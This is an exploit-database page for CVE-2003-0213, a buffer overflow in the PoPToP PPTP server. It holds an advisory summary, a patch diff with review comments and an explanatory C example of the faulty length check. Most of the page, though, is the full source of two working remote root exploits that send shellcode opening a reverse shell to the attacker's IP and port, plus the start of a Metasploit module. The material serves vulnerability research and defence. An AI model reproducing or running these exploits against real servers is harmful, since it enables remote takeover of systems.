CVE-2003-0213
CVSS 7.5
Published: 2003-05-12 00:00:00
Revised: 2016-10-17 22:30:46

[Original] ctrlpacket.c in PoPToP PPTP server before 1.1.4-b3 allows remote attackers to cause a denial of service via a length field of 0 or 1, which causes a negative value to be fed into a read operation, leading to a buffer overflow.
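The mechanism described above, as an added C example (not PoPToP's own source and not taken from any of the exploits on this page): a 16-bit length of 0 or 1, minus the two length bytes already consumed, becomes a negative `int` that the `read()` call silently converts to a `size_t` near SIZE_MAX. The 12-byte header size comes from the `pptp_header` struct shown further down the page; the value 1024 for `PPTP_MAX_CTRL_PCKT_SIZE` and the `length - 2` arithmetic are assumptions standing in for the real ctrlpacket.c constant and code, and the sample packets are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <arpa/inet.h>   /* ntohs() */

/* Wire layout from the pptp_header struct shown on this page:
 * u16 length, u16 pptp_type, u32 magic, u16 ctrl_type, u16 reserved = 12 bytes. */
#define PPTP_HEADER_SIZE         12
/* Assumption: a fixed upper bound standing in for ctrlpacket.c's
 * PPTP_MAX_CTRL_PCKT_SIZE; the real value is not given on this page. */
#define PPTP_MAX_CTRL_PCKT_SIZE  1024

/* Constructed sample packets.  Only the first two bytes (the big-endian
 * length field) matter for the check being demonstrated. */
static const unsigned char pkt_len0[]    = { 0x00, 0x00, 0x00, 0x01 };
static const unsigned char pkt_len1[]    = { 0x00, 0x01, 0x00, 0x01 };
static const unsigned char pkt_len156[]  = { 0x00, 0x9c, 0x00, 0x01 };  /* 156 = a full Start-Control-Connection-Request */
static const unsigned char pkt_len2000[] = { 0x07, 0xd0, 0x00, 0x01 };

/* Vulnerable pattern, modelled on the page's description (assumption, not
 * PoPToP's exact code): the two length bytes are already consumed, so the
 * server computes "length - 2" in a signed int and hands it to read(), whose
 * count parameter is size_t.  For length 0 or 1 the negative result wraps to
 * a value near SIZE_MAX, so read() may write far past the receive buffer. */
size_t unchecked_read_count(const unsigned char *pkt)
{
    uint16_t length;
    memcpy(&length, pkt, sizeof length);
    length = ntohs(length);
    int remaining = length - 2;          /* -2 or -1 for length 0 / 1 */
    return (size_t)remaining;            /* the implicit conversion at the read() call */
}

/* Hardened form: validate the length before doing any arithmetic on it.
 * Returns 0 and the number of bytes still to read on success, -1 otherwise. */
int checked_read_count(const unsigned char *pkt, size_t avail, size_t *remaining_out)
{
    uint16_t length;
    if (avail < sizeof length)
        return -1;                       /* not even a full length field yet */
    memcpy(&length, pkt, sizeof length);
    length = ntohs(length);
    if (length < PPTP_HEADER_SIZE || length > PPTP_MAX_CTRL_PCKT_SIZE)
        return -1;                       /* out of sync: caller must close the control connection */
    *remaining_out = (size_t)length - sizeof length;
    return 0;
}

int main(void)
{
    size_t n;
    printf("length 1, unchecked: read() would be asked for %zu bytes\n",
           unchecked_read_count(pkt_len1));
    printf("length 1, checked:   %s\n",
           checked_read_count(pkt_len1, sizeof pkt_len1, &n) == 0 ? "accepted" : "rejected");
    if (checked_read_count(pkt_len156, sizeof pkt_len156, &n) == 0)
        printf("length 156, checked: accepted, %zu bytes still to read\n", n);
    return 0;
}
```

The lower bound is deliberately the full header size rather than a bare literal: any control packet shorter than its own fixed header cannot be valid, and tying the constant to the struct documents why the check exists.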


[CNNVD] PoPToP PPTP read() Negative Argument Remote Buffer Overflow Vulnerability (CNNVD-200305-036)

        PoPToP PPTP is generally used to establish VPN connections and is used with Windows operating systems.
        PoPToP PPTP lacks proper filtering checks when referencing user-supplied input used in various calculations. A remote attacker can exploit this vulnerability to corrupt sensitive memory of the service process and may be able to execute arbitrary instructions on the system with the privileges of the PoPToP process.

- CVSS (Base Score)

CVSS Score: 7.5 [Severe (HIGH)]
Confidentiality Impact: [--]
Integrity Impact: [--]
Availability Impact: [--]
Attack Complexity: [--]
Attack Vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:poptop:pptp_server:1.0.1
cpe:/a:poptop:pptp_server:1.1.3_2002-10-09
cpe:/a:poptop:pptp_server:1.1.4b2
cpe:/a:poptop:pptp_server:1.1.4b1
cpe:/a:poptop:pptp_server:1.1.2
cpe:/a:poptop:pptp_server:1.1.3

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0213
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0213
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-036
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=105068728421160&w=2
(UNKNOWN)  BUGTRAQ  20030418 Exploit for PoPToP PPTP server
http://marc.info/?l=bugtraq&m=105154539727967&w=2
(UNKNOWN)  BUGTRAQ  20030428 GLSA: pptpd (200304-08)
http://sourceforge.net/project/shownotes.php?release_id=138437
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=138437
http://www.debian.org/security/2003/dsa-295
(VENDOR_ADVISORY)  DEBIAN  DSA-295
http://www.kb.cert.org/vuls/id/673993
(UNKNOWN)  CERT-VN  VU#673993
http://www.novell.com/linux/security/advisories/2003_029.html
(UNKNOWN)  SUSE  SuSE-SA:2003:029
http://www.securityfocus.com/archive/1/317995
(VENDOR_ADVISORY)  BUGTRAQ  20030409 PoPToP PPTP server remotely exploitable buffer overflow
http://www.securityfocus.com/archive/1/319428
(UNKNOWN)  BUGTRAQ  20030422 Re: Exploit for PoPToP PPTP server - Linux version
http://www.securityfocus.com/bid/7316
(VENDOR_ADVISORY)  BID  7316

- Vulnerability Information

PoPToP PPTP read() Negative Argument Remote Buffer Overflow Vulnerability
High  Boundary Condition Error
2003-05-12 00:00:00 2012-11-30 00:00:00
Remote

- Advisories and Patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Timo Sirainen <tss@iki.fi> provides the following third-party patch:
        --- ctrlpacket.c.old 1999-12-23 23:43:33.000000000 +0200
        +++ ctrlpacket.c 2003-04-09 18:58:21.000000000 +0300
        @@ -254,8 +254,8 @@
         }
         /* OK, we have (at least) the first 2 bytes, and there is data waiting */
         length = htons(*(u_int16_t *) packet);
        - if (length > PPTP_MAX_CTRL_PCKT_SIZE) {
        - syslog(LOG_ERR, "CTRL: Control packet > PPTP_MAX_CTRL_PCKT_SIZE (length = %d)", length);
        + if (length <= 10 || length > PPTP_MAX_CTRL_PCKT_SIZE) {
        + syslog(LOG_ERR, "CTRL: 11 < Control packet (length=%d) < ", length);
         /* we loose sync (unless we malloc something big, which isn't a good
         * idea - potential DoS) so we must close connection (draft states that
         * if you loose sync you must close the control connection immediately)
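Review bot: the replacement log message on the `+ syslog(...)` line reads as an unfinished inequality with no upper bound ("CTRL: 11 < Control packet (length=%d) < "), so an operator reading the log cannot tell which limit was violated; suggest something like "CTRL: control packet length %d out of range (must be > 10 and <= PPTP_MAX_CTRL_PCKT_SIZE)". The literal 10 on the `+ if (length <= 10 || ...)` line is also a magic number: the pptp_header struct shown elsewhere on this page is 12 bytes, so expressing the lower bound as `sizeof(struct pptp_header)` (or a named constant next to PPTP_MAX_CTRL_PCKT_SIZE) both documents why the threshold exists and rejects the 11-byte case, which is still shorter than the fixed header. The check itself, rejecting the packet and closing the connection before `length - 2` is computed, is the right fix for the negative read count.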
        Vendor patch:
        PoPToP
        ------
        The vendor has not yet provided a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version:

        http://www.poptop.org

- Vulnerability Information (16)

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (EDBID:16)
linux remote
2003-04-18 Verified
1723 einstein
N/A
/* 
*  exploit for a recently discovered vulnerability in PoPToP
*  PPTP server under Linux. Versions affected are all prior to
*  1.1.4-b3 and 1.1.3-20030409.
*  The exploit is capable of bruteforcing the RET address to find our
*  buffer in the stack. Upon a successfull run it brings up a reverse
*  shell with privileges of the pptpd daemon (typically root)
*  on the victim server.
*/

#include <iostream.h>
#include <winsock.h>
#include <stdio.h>

#define u_int8_t char
#define u_int16_t WORD
#define u_int32_t DWORD


char shellcode[] =

"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b"
"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a"
"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d"

"\x01\x01" // port

"\x54\xd6\x63"

"\x01\x01\x01\x01" // ip address

"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67"
"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e"
"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b"
"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60"
"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa"
"\xfd\xbc\xe0\xfb";




struct pptp_header {
        u_int16_t length;               /* pptp message length incl header */
        u_int16_t pptp_type;            /* pptp message type */
        u_int32_t magic;                /* magic cookie */
        u_int16_t ctrl_type;            /* control message type */
        u_int16_t reserved0;            /* reserved */
};

#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100

struct pptp_start_ctrl_conn_rqst {
        struct pptp_header header;      /* pptp header */
        u_int16_t version;              /* pptp protocol version */
        u_int16_t reserved1;            /* reserved */
        u_int32_t framing_cap;          /* framing capabilities */
        u_int32_t bearer_cap;           /* bearer capabilities */
        u_int16_t max_channels;         /* maximum channels */
        u_int16_t firmware_rev;         /* firmware revision */
        u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
        u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
        struct pptp_header header;      /* header */
        u_int32_t identifier;           /* value to match rply with rqst */
                                char buf[10000];
};

struct pptp_reply {
        struct pptp_header header;      /* header */
                                char buf[10000];
};


/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
#define TOPOFSTACK 0xbfffffff
#define BOTTOMOFSTACK 0xbf000000
#define STEP 50

void send_init_request(SOCKET st)
{
        pptp_start_ctrl_conn_rqst request;
  request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

  request.version = PPTP_VERSION;
        request.framing_cap = 0;
        request.bearer_cap = 0;
        request.max_channels = 1;
        request.firmware_rev = 0;
  strcpy(request.hostname,"hell");
        strcpy(request.vendor,"domain HELL");
  request.header.length = ntohs(sizeof(request));

        send(st,(char*)&request,sizeof(request),0);

}

void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port)
{ 
  pptp_echo_rqst ping;
        ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
        ping.header.ctrl_type = htons(ECHO_RQST);
        ping.identifier = 111;

        ping.header.length = ntohs(1);
        
  
        strcpy(ping.buf,"");
        
        int buflen = 500;
        for (int i=0;i<buflen;i++)strcat(ping.buf,"\x90");      
        memcpy(ping.buf+364,(char*)&ret,4); 

        // patch shellcode
        // we have a shellcode xored by 0x93.. let's unxor it :)
        for (i=0;i<sizeof(shellcode);i++) shellcode[i] ^= 0x93;

        *(unsigned short int*)(shellcode+43) = htons(port);
        
  *(unsigned long int*)(shellcode+48) = inet_addr(hostname);

        // we leave 100 bytes for NOPs
        memcpy(ping.buf+100,shellcode,sizeof(shellcode));
                
        send(st,(char*)&ping,sizeof(ping.header)+buflen,0);
 
}

SOCKET st;

int connect_server(char* hostname)
{
        st=socket(PF_INET,SOCK_STREAM,0);
        if (st==INVALID_SOCKET) return 0;

        sockaddr_in addr;

        addr.sin_family=AF_INET;
        addr.sin_port=0;
        addr.sin_addr.s_addr=0;
        bind(st, (LPSOCKADDR)&addr,sizeof(addr));
  
        
        addr.sin_family=AF_INET;
        addr.sin_port=htons(1723);
        addr.sin_addr.s_addr=inet_addr(hostname);
        printf("connecting... ");
        if (connect(st,(sockaddr*)&addr,sizeof(addr)) != 0)
        {
                printf("Connect error. GetLastError=%d\n",GetLastError());
                return 0;
        }
        return 1;
}

int main(int argc, char** argv)
{
        printf("\n");
        printf("                   D  H     H                            \n");
        printf("                   D  H     H     T\n");
        printf("                   D  H  H  H     T     EE    AA   M   M \n");
        printf("               DDD D  HHHHHHH     T    E  E  A  A  MM MM \n");
        printf("              D   DD  H  H  H    TTTT  E  E  A  A  MM MM \n");
        printf("             D     D  H     H     T    EEE   AAAA  M M M \n");
        printf("              D    D  H     H     T    E     A  A  M   M \n");
        printf("               DDDD   H     H      TTT  EEE  A  A  M   M   ");
        printf(" ... presents ... \n\n");
  printf("Exploit for PoPToP PPTP server older than \n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
        printf("by .einstein., April 2003.\n");
        printf("\n");
  if (argc < 2)
  {
                printf("usage: \n");
                printf("  %s <pptp_server> [<your_ip>] [<your_port>] [<timeout>]\n\n",argv[0]);
                printf("    <pptp_server> is the ip address or hostname of the PoPToP server\n");
                printf("      you want to attack.  Port 1723 is used for connection\n");
                printf("    <your_ip> and <your_port> - specify an ip address to which\n");
                printf("      a connection is possible to port <your_port> and set up a\n");
                printf("      netcat listener. You'll get a reverse shell.\n");
                printf("    <timeout> is a delay between stack bruteforce attemts, in milliseconds\n");
                printf("   If you only pass a single parameter, the program will check\n");
                printf("   whether remote server is vulnerable or not. Otherwise it will\n");
                printf("   perform a ret bruteforce.\n");
                printf("usage examples:\n");
                printf("  %s 192.168.1.2 192.168.1.1 5555\n",argv[0]);
                printf("    attack 192.168.1.2 and get a reverse shell on port 5555\n");
          printf("  %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]);
                printf("    attack a locally running pptpd with a timeout of 100 ms\n");
                printf("    and get a shell on port 6666.\n");
                printf("  %s 192.168.1.56\n",argv[0]);
                printf("    check if the PoPToP server on 192.168.1.56 is vulnerable.\n");
    return 0;
        }


  int timeout = 500;
  if (argc >= 5) timeout = atoi(argv[4]);

        // init winsock
        WORD version=0x0101;
  WSADATA data;
  WSAStartup(version,&data);

        DWORD ret;
        if (argc == 2)
        {
                if (!connect_server(argv[1])) return 1;

                printf("\nChecking if the server is vulnerable..\n");
                printf("(if it is you have to wait 65 seconds)..\n");
                send_init_request(st);

                ret = 0x01010101;
                int bytes;
                pptp_reply reply;
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                bytes = ntohs(reply.header.length);
                bytes = recv(st,(char*)&reply+2,bytes-2,0);
                int j = htons(reply.header.ctrl_type);
                send_ping_overflow(st,ret,"0.0.0.0",0);
                        
                //header length
                bytes = recv(st,(char*)&reply,2,0);
                printf("PoPToP server is ");
                if (bytes != SOCKET_ERROR) printf("vulnerable!\n");
                else printf("not vulnerable\n");
                closesocket(st);

                return 1;
        }

        printf("[!] Attempting bruteforce against %s\n",argv[1]);
        printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));
        
        int checked = 0;
        
        for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP)
        {
          printf("[*] ");
                if (!connect_server(argv[1])) return 1;
        printf("[ret=0x%x]..",ret);
        printf("sending payload..");
        
                // initial packet
                send_init_request(st);

                //a real overflowing ping packet
          send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
                closesocket(st);

                Sleep(timeout);
                printf("done\n");
        
                
        
        }
        
        return 0;
}


// milw0rm.com [2003-04-18]
		

- Vulnerability Information (19)

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c) (EDBID:19)
linux remote
2003-04-25 Verified
1723 blightninjas
N/A
/*
 * Fixed Exploit against PoPToP in Linux (poptop-sane.c)
 * ./r4nc0rwh0r3 of blightninjas (blightninjas@hushmail.com)
 *
 * blightninjas: bringing pain, suffering, and humiliation to the security world
 * Expect more great release like helloworld-annotated.c and
 * cd explained whitepaper, we are working hard in da underground
 *
 * Other Editions Available At:
 *   http://www.freewebs.com/blightninjas/
 *
 *  *** Bugtraq Clean Edition ***
 * Based off of code by einstein_dhtm@front.ru
 * 
 * Notes on the exploit:
 * This was only tested under slackware, RET_OFF could possibly
 * be different.
 * You can have nulls in the shellcode (the hole is in a read())
 * This allows you to have ips and ports with nulls in them
 * 
 * Shouts to ADM, TESO, and all the other "cool" groups that never give us 0day
 *
 * Examples:
 * attack target 1
 * nc -v -l -p 10000 <-- on 1.1.1.2
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t 1
 * don't come to use, we come to you.
 *
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t
 * list targets
 *
 * ./poptop-sane 1.1.1.1 1.1.1.2 10000 -r 0xbffff600
 * attack using ret address 0xbffff600
 *
 * I think you get the point
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>

#define NOP_LENGTH 140
// I calculate at 336, I'll fudge to make more general
#define RET_OFF 320
#define MAX_HOSTNAME_SIZE               64
#define MAX_VENDOR_SIZE                 64
#define PPTP_VERSION                    0x0100
/* Magic Cookie */
#define PPTP_MAGIC_COOKIE               0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE               1

/* Control Connection Management */
#define START_CTRL_CONN_RQST            1
#define START_CTRL_CONN_RPLY            2
#define STOP_CTRL_CONN_RQST             3
#define STOP_CTRL_CONN_RPLY             4
#define ECHO_RQST                       5
#define ECHO_RPLY                       6

// brute force values
// Values can be increased both ways
#define TOPOFSTACK 0xbffff800
#define BOTTOMOFSTACK 0xbffff000
#define STEP 64

/* esdee I love you, call me sometime */
char
shellcode[] = 
  "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
  "\x06\x51\xb1\x01\x51\xb1\x02\x51"
  "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
  "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
  "\x68\x41\x42\x43\x44\x66\x68\xb0"
  "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
  "\x10\x53\x57\x52\x89\xe1\xb3\x03"
  "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
  "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
  "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
  "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
  "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
  "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
  "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
  "\x2f\x62\x69\x89\xe3\x50\x53\x89"
  "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
  "\x01\xcd\x80";

int st;
struct target {
  char *desc;
  u_int32_t ret;
} targets[] =
{
  {"Slackware 8.0 Linux 2.4.18 pptpd-1.0.1", 0xbffff540},
  {"Slackware 8.0 Linux 2.4.18 pptpd-1.1.3", 0xbffff580},
};
  
struct pptp_header {
  u_int16_t length;               /* pptp message length incl header */
  u_int16_t pptp_type;            /* pptp message type */
  u_int32_t magic;                /* magic cookie */
  u_int16_t ctrl_type;            /* control message type */
  u_int16_t reserved0;            /* reserved */
};

struct pptp_start_ctrl_conn_rqst {
  struct pptp_header header;      /* pptp header */
  u_int16_t version;              /* pptp protocol version */
  u_int16_t reserved1;            /* reserved */
  u_int32_t framing_cap;          /* framing capabilities */
  u_int32_t bearer_cap;           /* bearer capabilities */
  u_int16_t max_channels;         /* maximum channels */
  u_int16_t firmware_rev;         /* firmware revision */
  u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
  u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */
};

struct pptp_echo_rqst {
  struct pptp_header header;      /* header */
  u_int32_t identifier;           /* value to match rply with rqst */
  char buf[10000];
};

struct pptp_reply {
  struct pptp_header header;      /* header */
  char buf[10000];
};

void catch_pipe() {
  printf("Broken pipe caught, server most likely patched.\n");
  exit(1);
}
void send_init_request(int st)
{
  struct pptp_start_ctrl_conn_rqst request;
  request.header.magic = htonl(PPTP_MAGIC_COOKIE);
  request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
  request.header.ctrl_type = htons(START_CTRL_CONN_RQST);
  
  request.version = PPTP_VERSION;
  request.framing_cap = 0;
  request.bearer_cap = 0;
  request.max_channels = 1;
  request.firmware_rev = 0;
  strcpy(request.hostname,"hell");
  strcpy(request.vendor,"domain HELL");
  request.header.length = ntohs(sizeof(request));
  
  send(st,(char*)&request,sizeof(request),0);
}

void send_ping_overflow(int st, u_int32_t ret, char *hostname, short port)
{ 
  struct pptp_echo_rqst ping;
  int i, buflen = 500;

  ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
  ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
  ping.header.ctrl_type = htons(ECHO_RQST);
  ping.identifier = 111;  
  ping.header.length = ntohs(1);

  for (i = 0; i < NOP_LENGTH; i++) ping.buf[i] = '\x90';      

  *(unsigned long int*)(shellcode+33) = inet_addr(hostname);
  *(unsigned short int*)(shellcode+39) = htons(port);

  memcpy(ping.buf+NOP_LENGTH,shellcode,sizeof(shellcode));
  for(i = RET_OFF; i < buflen - 4; i+=4)
    memcpy(ping.buf+i,(char*)&ret,4); 

  send(st,(char*)&ping,sizeof(ping.header)+buflen,0); 
}

int connect_server(char* hostname)
{
  struct sockaddr_in addr;
  st=socket(PF_INET,SOCK_STREAM,0);
  if ((st=socket(PF_INET,SOCK_STREAM,0)) == -1) return 0;

  addr.sin_family=AF_INET;
  addr.sin_port=0;
  addr.sin_addr.s_addr=0;
  bind(st, (struct sockaddr *)&addr,sizeof(struct sockaddr));
  
  addr.sin_family=AF_INET;
  addr.sin_port=htons(1723);
  addr.sin_addr.s_addr=inet_addr(hostname);
  printf("connecting... ");
  if ((connect(st,(struct sockaddr*)&addr,sizeof(addr))) != 0)
  {
    perror("connect");
    return 0;
  }
  return 1;
}

int main(int argc, char** argv)
{
  struct pptp_reply reply;
  // rushing things only makes it worse
  int timeout = 1000;
  u_int32_t ret;
  int bytes, j, checked = 0;
  signal(SIGPIPE, catch_pipe);
  printf("\n");
  // Sorry, I failed REALLY FUCKING LAME ASCII ART class
  printf("        D     A     SSSSS                           \n");
  printf("        D    A A    S     SSSSS     T\n");
  printf("        D   A   A   S     S         T     EE    AA   M   M \n");
  printf("    DDD D  AAAAAAA  SSSSS S         T    E  E  A  A  MM MM \n");
  printf("   D   DD  A     A      S SSSSS    TTTT  E  E  A  A  MM MM \n");
  printf("  D     D  A     A      S     S     T    EEE   AAAA  M M M \n");
  printf("   D    D  A     A  SSSSS     S     T    E     A  A  M   M \n");
  printf("    DDDD   A     A        SSSSS      TTT  EEE  A  A  M   M   ");
  printf(" ... presents ... \n\n");                
  printf("Exploit for PoPToP PPTP server older than\n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
  printf("by .einstein., April 2003.  <-- the genius\n\n");
  printf("fixed by ./r4nc0rwh0r3 of blightninjas  blightninjas@hushmail.com\n\n");
  if (argc < 2)
  {
    printf("usage: \n");
    printf("  %s <pptp_server> [your_ip] [your_port] ...\n",argv[0]);
    printf("   -b [timeout in ms]\n");
    printf("   -t [target]\n");
    printf("   -r [ret address]\n");
    //Abridged edition 
    printf(" Only supply pptp_server to test exploitability using really poor method.\n");
    printf(" Connect back to your_ip at your_port.\n\n");
    return 0;
  }

  if (argc == 2)
  {
    if (!connect_server(argv[1])) return 1;
  
    printf("\nChecking if the server is vulnerable..\n");
    printf("(if it is you have to wait 65 seconds)..\n");
    send_init_request(st);
  
    ret = 0x01010101;
  
    //header length
    bytes = recv(st,(char*)&reply,2,0);
    bytes = ntohs(reply.header.length);
    bytes = recv(st,(char*)&reply+2,bytes-2,0);
    j = htons(reply.header.ctrl_type);
    send_ping_overflow(st,ret,"0.0.0.0",0);
  
    //header length
    bytes = recv(st,(char*)&reply,2,0);
    printf("PoPToP server is ");
    if ((bytes = recv(st,(char*)&reply,2,0)) != -1) printf("vulnerable!\n");
    else printf("not vulnerable\n");
    close(st);
  
    return 1;
  }
  if(argc < 5) exit(1);
  else if(strncmp(argv[4], "-b", 2) == 0) {
    if(argc == 6) timeout = atoi(argv[5]);
    printf("[!] Attempting bruteforce against %s, timeout: %d\n", argv[1], timeout);
    printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));

    for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP) {
      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      usleep(timeout * 1000);
      printf("done\n");
    }
  }
  else if(strncmp(argv[4], "-t", 2) == 0) {
    if(argc == 6 && atoi(argv[5]) >= 0
     && atoi(argv[5]) < sizeof(targets)/sizeof(struct target)) {
      ret = targets[atoi(argv[5])].ret;
      printf("[!] Attacking %s using %s\n", argv[1], targets[atoi(argv[5])].desc);

      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      printf("done\n");
    }
    else {
      for(j = 0; j < sizeof(targets)/sizeof(struct target); j++) {
        printf("%02d - %s\n", j, targets[j].desc);
      }
      printf("\n");
    }
  }
  else if(strncmp(argv[4], "-r", 2) == 0) {
    if(argc == 6) {
      sscanf(argv[5], "%x", (unsigned int *)&ret);
      printf("[!] Attacking %s\n", argv[1]);

      printf("[*] ");
      if (!connect_server(argv[1])) return 1;
      printf("[ret=0x%x]..",ret);
      printf("sending payload..");

      // initial packet
      send_init_request(st);

      //a real overflowing ping packet
      send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
      close(st);

      printf("done\n");
    }
  }
  return 0;
}

// milw0rm.com [2003-04-25]
		

- Vulnerability Information (16845)

Poptop Negative Read Overflow (EDBID:16845)
linux remote
2010-11-23 Verified
0 metasploit
N/A
##
# $Id: poptop_negative_read.rb 11114 2010-11-23 18:12:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Poptop Negative Read Overflow',
			'Description'    => %q{
					This is an exploit for the Poptop negative read overflow.  This will
				work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
				currently do not have a good way to detect Poptop versions.

				The server will by default only allow 4 concurrent manager processes
				(what we run our code in), so you could have a max of 4 shells at once.

				Using the current method of exploitation, our socket will be closed
				before we have the ability to run code, preventing the use of Findsock.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11114 $',
			'References'     =>
				[
					['CVE', '2003-0213'],
					['OSVDB', '3293'],
					['URL',   'http://securityfocus.com/archive/1/317995'],
					['URL',   'http://www.freewebs.com/blightninjas/'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# Payload space is dynamically determined
					'MinNops'         => 16,
					'StackAdjustment' => -1088,
					'Compat'          =>
						{
							'ConnectionType' => '-find',
						}
				},
			'SaveRegisters'  => [ 'esp' ],
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        =>
				[
					['Linux Bruteforce',
						{ 'Bruteforce' =>
							{
								'Start'  => { 'Ret' => 0xbffffa00 },
								'Stop'   => { 'Ret' => 0xbffff000 },
								'Step'   => 0
							}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 9 2003'))

		register_options(
			[
				Opt::RPORT(1723)
			], self.class)

		register_advanced_options(
			[
				OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
				OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
				OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
				OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
				OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
			], self.class)
	end

	# Dynamic payload space calculation
	def payload_space(explicit_target = nil)
		datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
	end

	def build_packet(length)
		[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
			[1,0].pack('cc') +
			[0].pack('n') +
			[1,1,0,2600].pack('NNnn') +
